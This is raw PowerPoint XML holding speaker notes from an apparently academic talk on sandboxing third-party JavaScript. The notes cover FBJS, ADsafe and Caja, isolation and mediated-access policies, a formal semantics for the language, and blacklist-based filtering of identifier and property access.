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embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject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86"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId87"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="833" r:id="rId3"/>
    <p:sldId id="654" r:id="rId4"/>
    <p:sldId id="655" r:id="rId5"/>
    <p:sldId id="656" r:id="rId6"/>
    <p:sldId id="821" r:id="rId7"/>
    <p:sldId id="622" r:id="rId8"/>
    <p:sldId id="743" r:id="rId9"/>
    <p:sldId id="750" r:id="rId10"/>
    <p:sldId id="747" r:id="rId11"/>
    <p:sldId id="823" r:id="rId12"/>
    <p:sldId id="857" r:id="rId13"/>
    <p:sldId id="858" r:id="rId14"/>
    <p:sldId id="751" r:id="rId15"/>
    <p:sldId id="778" r:id="rId16"/>
    <p:sldId id="856" r:id="rId17"/>
    <p:sldId id="815" r:id="rId18"/>
    <p:sldId id="772" r:id="rId19"/>
    <p:sldId id="807" r:id="rId20"/>
    <p:sldId id="754" r:id="rId21"/>
    <p:sldId id="780" r:id="rId22"/>
    <p:sldId id="808" r:id="rId23"/>
    <p:sldId id="767" r:id="rId24"/>
    <p:sldId id="768" r:id="rId25"/>
    <p:sldId id="766" r:id="rId26"/>
    <p:sldId id="531" r:id="rId27"/>
    <p:sldId id="676" r:id="rId28"/>
    <p:sldId id="677" r:id="rId29"/>
    <p:sldId id="793" r:id="rId30"/>
    <p:sldId id="809" r:id="rId31"/>
    <p:sldId id="829" r:id="rId32"/>
    <p:sldId id="830" r:id="rId33"/>
    <p:sldId id="814" r:id="rId34"/>
    <p:sldId id="825" r:id="rId35"/>
    <p:sldId id="810" r:id="rId36"/>
    <p:sldId id="834" r:id="rId37"/>
    <p:sldId id="697" r:id="rId38"/>
    <p:sldId id="698" r:id="rId39"/>
    <p:sldId id="699" r:id="rId40"/>
    <p:sldId id="700" r:id="rId41"/>
    <p:sldId id="816" r:id="rId42"/>
    <p:sldId id="701" r:id="rId43"/>
    <p:sldId id="817" r:id="rId44"/>
    <p:sldId id="790" r:id="rId45"/>
    <p:sldId id="791" r:id="rId46"/>
    <p:sldId id="715" r:id="rId47"/>
    <p:sldId id="716" r:id="rId48"/>
    <p:sldId id="717" r:id="rId49"/>
    <p:sldId id="718" r:id="rId50"/>
    <p:sldId id="719" r:id="rId51"/>
    <p:sldId id="720" r:id="rId52"/>
    <p:sldId id="721" r:id="rId53"/>
    <p:sldId id="722" r:id="rId54"/>
    <p:sldId id="818" r:id="rId55"/>
    <p:sldId id="612" r:id="rId56"/>
    <p:sldId id="679" r:id="rId57"/>
    <p:sldId id="832" r:id="rId58"/>
    <p:sldId id="681" r:id="rId59"/>
    <p:sldId id="839" r:id="rId60"/>
    <p:sldId id="836" r:id="rId61"/>
    <p:sldId id="837" r:id="rId62"/>
    <p:sldId id="855" r:id="rId63"/>
    <p:sldId id="850" r:id="rId64"/>
    <p:sldId id="851" r:id="rId65"/>
    <p:sldId id="852" r:id="rId66"/>
    <p:sldId id="853" r:id="rId67"/>
    <p:sldId id="854" r:id="rId68"/>
    <p:sldId id="684" r:id="rId69"/>
    <p:sldId id="846" r:id="rId70"/>
    <p:sldId id="847" r:id="rId71"/>
    <p:sldId id="848" r:id="rId72"/>
    <p:sldId id="849" r:id="rId73"/>
    <p:sldId id="845" r:id="rId74"/>
    <p:sldId id="685" r:id="rId75"/>
    <p:sldId id="686" r:id="rId76"/>
    <p:sldId id="687" r:id="rId77"/>
    <p:sldId id="840" r:id="rId78"/>
    <p:sldId id="688" r:id="rId79"/>
    <p:sldId id="689" r:id="rId80"/>
    <p:sldId id="690" r:id="rId81"/>
    <p:sldId id="691" r:id="rId82"/>
    <p:sldId id="692" r:id="rId83"/>
    <p:sldId id="693" r:id="rId84"/>
    <p:sldId id="796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5BD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772" autoAdjust="0"/>
    <p:restoredTop sz="90538" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-1168" y="-312"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2544"/>
        <p:guide pos="3312"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="1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10EE0-C643-3B44-9101-32F877A6AE19}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/11/12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34D1-7ECD-6D47-B274-0C4649A4E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1A330-5EC4-0049-91AE-120728EE034B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/11/12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929A-3812-B543-9319-314D326FF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have two third-party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> components then the hosting page might want to isolate them from each other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is called the inter-component isolation policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Ensure sandboxed components do not ……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that this policy is weaker than non-interference and does not eliminate covert channels, they only eliminate communication via the heap.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(We  went for this policy as this seemed to be the policy that FBJS was trying to enforce) – Also it is unclear if we want to have complete non-interference between ads.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previous two policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> enforce isolation. So we can enforce complete isolation of the location object from untrusted code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> However this may be stronger than the desired policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We may be fine with third-party cod accessing the location object so long as it only sets the location to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>subdomains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google.com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microsoft.com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call this weaker policy mediated access policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>All access to security critical resources must be mediated by the hosting page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>One way of enforcing mediated access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In order to do this the hosting page first creates an API that provides restricted access to the underlying resources, then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third-party code, statically analyzes and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>rewritesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it so that it can only access the API. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So language-based sandboxing must restrict untrusted code to the API and the API must provide restricted or mediated access to the underlying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>resrouces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security goal is that no direct access to security critical resources.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THIS SLIDE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popular approach to solving this problem is API + language-based sandboxing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The main idea is as follows -&gt; trusted hosting page loads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>firtst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and creates an API that mediates access to all protected resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Then untrusted third-party code is first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>fetvhed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> into the hosting page server, and it is filtered and rewritten such that only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It can only access the API. This filtering and rewriting is the language-based sandboxing.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security property is that untrusted code must not directly come to hold any security-critical resource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approach is used by FBJS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSAfe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Caja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Now the sandbox ensures that untrusted code can only access the API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The security of the approach relies on the API doing its job correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>That is, it itself must not leak a reference to a critical resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This property is quite subtle to check especially for JS APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We illustrate it using the following example.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previous two policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> enforce isolation. So we can enforce complete isolation of the location object from untrusted code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> However this may be stronger than the desired policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We may be fine with third-party cod accessing the location object so long as it only sets the location to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>subdomains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google.com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microsoft.com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call this weaker policy mediated access policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>All access to security critical resources must be mediated by the hosting page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>One way of enforcing mediated access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In order to do this the hosting page first creates an API that provides restricted access to the underlying resources, then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third-party code, statically analyzes and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>rewritesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it so that it can only access the API. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So language-based sandboxing must restrict untrusted code to the API and the API must provide restricted or mediated access to the underlying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>resrouces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security goal is that no direct access to security critical resources.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THIS SLIDE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popular approach to solving this problem is API + language-based sandboxing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The main idea is as follows -&gt; trusted hosting page loads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>firtst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and creates an API that mediates access to all protected resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Then untrusted third-party code is first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>fetvhed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> into the hosting page server, and it is filtered and rewritten such that only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It can only access the API. This filtering and rewriting is the language-based sandboxing.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security property is that untrusted code must not directly come to hold any security-critical resource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approach is used by FBJS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSAfe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Caja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Now the sandbox ensures that untrusted code can only access the API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The security of the approach relies on the API doing its job correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>That is, it itself must not leak a reference to a critical resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This property is quite subtle to check especially for JS APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We illustrate it using the following example.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have two third-party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> components then the hosting page might want to isolate them from each other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is called the inter-component isolation policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Ensure sandboxed components do not ……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that this policy is weaker than non-interference and does not eliminate covert channels, they only eliminate communication via the heap.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(We  went for this policy as this seemed to be the policy that FBJS was trying to enforce) – Also it is unclear if we want to have complete non-interference between ads.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the browser picture on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>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the setup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Above semantics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> write mathematical framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Remove ES3 etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Put an outline right after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developed an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>operatonal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semantics for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> this language, firstly to setup a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mathemtical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> framework for reasoning about JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And also partly to just understand the language.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Dveloping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> an operational semantics for a real language is quite hard. We don’t want a toy semantics we want the whole thing.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aseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>develeped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a small –step style semantics by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>adapating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Plotkin’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> seminal work to JavaScript.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Its based on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edition of the spec, we don’t model the DOM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As I said it is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the whole thing so it is fairly long and took us 6 man months</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We obtained lots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valuable insights, potted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>discripensies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> across browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And proved a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>basica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> sanity check theorem that execution of a term only depends on the set of reachable heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>locaitons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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> so for example we have this program , what are the global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that it can access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Can it access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Unfortuantely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> yes because you can delete variables form JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Ahh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> lets remove delete from the language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>OK so then you can use the keyword this to directly get hold of the global scope and read properties off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Fine I will disallow this as well. Then you will dynamically generate this code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And then you can trick me with with , try –catch and other fancy scope </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>manipulatiion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mechanisms.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 I give up. I will not do a scope analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>I am stuck with fact that any identifier that you have is a global variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And all global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vars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accessibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> via the global object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I conservatively reformulate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the sandboxing problem to say that sandboxed code must not access any identifier or property name from the blacklist B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Be it a local variable or a global variable, if it in the blacklist then you cannot access it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In order to solve this problem, our approach has two steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>First we must disallow all forms of dynamic code generation. This is because if there is dynamic code generation, then that provides a channel for generating code at runtime that escapes our sandboxing mechanism.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step is to then identify all identifier and property lookup channels and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>impos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a blacklisting check on them,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 am sure all of you have used web sites that have ads, map or social networking apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are all examples of third-party content which websites embed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Very often such third-party content contains of executable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content that reacts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user events, manipulates features of the hosting page, interacts with the server and thus provides a rich user  experience.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This work is about developing 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is the standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> identifier mechanisms which is that you can access identifiers by simply naming them in the code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We therefore filter out all terms that use a blacklisted identifier name.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is the Dot mechanism so you can access property names by using the expressed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>e.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> where expression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evaluates to an object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is a property name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Again we filter out all terms that have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>subterm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e.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> such that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blacklsited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Property names can be accessed by the standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>e.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mechanism where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is an object and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is a property name. Again we impose a filter which discards all programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>That contain a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>subterm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e.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> such that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balcklisted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property names can also be generated dynamically. Remember objects are hash tables in JavaScript so object properties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FBJS follows the language-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> sandboxing paradigm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Thirdparty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> applications are written in FBJS which is a subset of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These FBJS applications are first fetched by the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server which rewrites them and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Then embeds the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>reiwritten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> apps in profiles. Lets look at some of the restrictions enforced by the static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>subsetting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and rewriting.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the browser picture on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>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Standardized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> JS is an evolving language with the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 being the most recent standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The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 also has a strict mode which brings in standard properties like lexical scoping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Closure based encapsulation and isolation of global objects to the language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are very standard properties which were absent in ES3. For instance in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ES3 if you call a function then the function could a pointer into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> your activation record which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>basically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>reak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>closure based encapsulation. This is disallowed in ES5-strict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SSElight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which is the subset we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>deifne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is ES5strict + 3 restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Frozen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>builtin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which mean you can write to or read any properties of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>builtin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> objects</a:t>
            </a:r>
